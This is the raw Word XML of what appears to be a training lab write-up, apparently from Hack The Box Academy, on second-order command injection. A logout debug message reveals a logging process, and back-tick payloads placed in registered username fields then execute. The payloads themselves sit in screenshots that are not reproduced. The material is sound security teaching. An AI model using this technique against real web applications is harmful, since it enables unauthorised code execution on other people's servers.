          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">000000024:   200        0 L      3 W        40 Ch       "."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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We can see that the only special character allowed is the period; thus, we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot inject any payload that would result in code execution. Therefore, we need to determine if there is another way to change the IP address that bypasses the filter or if the web application potentially executes system commands at a different endpoint.</w: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If we analyze the network traffic closely, we can observe interesting behavior. When we log out of the web application, we are redirected to the login page. However, the response also contains the following content:</w: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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="1417320"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:docPr id="6"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pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId13"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="141732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51.30pt;height:111.60pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId13" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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While it may initially appear to be a debug message that inadvertently discloses a path on the web server (essentially an information di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">sclosure issue), it also suggests that the web application logs data based on user profiles. Depending on how the web application implements logging, there may be an opportunity to inject a payload into our user data, potentially leading to code execution.</w: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Regardless that the web application contains no functionality to modify user data, we can instead register a new user and inject a payload into the user data. We will attempt to register a user with special characters in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters to identify a potential vulnerability.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="3425825"/>
                <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
                <wp:docPr id="7"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8399" name="Picture 4" descr="A screenshot of a login form&#10;&#10;Description automatically generated"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId14"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="34258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51.30pt;height:269.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId14" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Afterward, we can log in as the newly registered user. If we now log out and analyze the response sent by the web application, we can indeed identify a potential command injection vulnerability:</w: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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="1698625"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:docPr id="8"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pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId15"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="16986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51.30pt;height:133.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId15" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="0" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9" name="_x0000_i1033"/>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8" o:spid="_x0000_s8" o:spt="1" type="#_x0000_t1" style="width:0.00pt;height:1.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;visibility:visible;" fillcolor="#A0A0A0" stroked="f"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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To exploit the vulnerability, we need to register a user with any valid command injection payload, for instance, by using back-ticks:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="3435985"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:docPr id="10"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57363" name="Picture 2" descr="A screenshot of a login form&#10;&#10;Description automatically generated"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId16"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="343598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51.30pt;height:270.55pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId16" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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After logging in and logging out, the injected command is executed:</w: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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="1674495"/>
                <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
                <wp:docPr id="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pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId17"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="167449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51.30pt;height:131.85pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId17" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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The web application implements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> a filter to protect against obvious command injection entry points; however, it lacks a proper filter for the background logging mechanism. If the debug messages at user logout were not left over, there would be no way for us to know about this mechanism.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:before="100" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Therefore, testing all user input fields for potential security vulnerabilities is crucial; this can include hundreds or even thousands of input fields in real-world web applications, so we need to rely on automated scanners to help us save time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, we should always perform manual testing on input fields we deem of particular interest, such as inputs related to our user profile (like our username), which the web application may use in background processes, such as a hidden logging mechanism.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:sectPr>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1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="632"/>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32"/>
    <w:link w:val="141"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="153">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="142"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="154">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="143"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="155">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="144"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="156">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="145"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="157">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="632"/>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32"/>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632"/>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632"/>
    <w:link w:val="162"/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="164">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="629"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="165">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="632"/>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32"/>
    <w:link w:val="166"/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="168">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="169">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="629"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="170">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="171">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="172">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="173">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5a5a5a" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="174">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="632"/>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632"/>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632"/>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632"/>
    <w:link w:val="180"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="182">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="632"/>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632"/>
    <w:link w:val="183"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="185">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="187">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="632"/>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paragraph" w:styleId="630">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="629"/>
    <w:link w:val="635"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100" w:afterAutospacing="1" w:before="100" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="631">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="629"/>
    <w:link w:val="636"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100" w:afterAutospacing="1" w:before="100" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="632" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="6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4" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="635" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="630"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="636" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="631"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="637">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="629"/>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14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="638">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="639">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="632"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000ff"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="640">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="629"/>
    <w:link w:val="641"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="641" w:customStyle="1">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="632"/>
    <w:link w:val="640"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="642" w:customStyle="1">
    <w:name w:val="token"/>
    <w:basedOn w:val="632"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="643" w:customStyle="1">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="632"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="644" w:customStyle="1">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="632"/>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academy.hackthebox.com/module/details/109" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/special-chars.txt"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revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-19T12:09:00Z</dcterms:created>
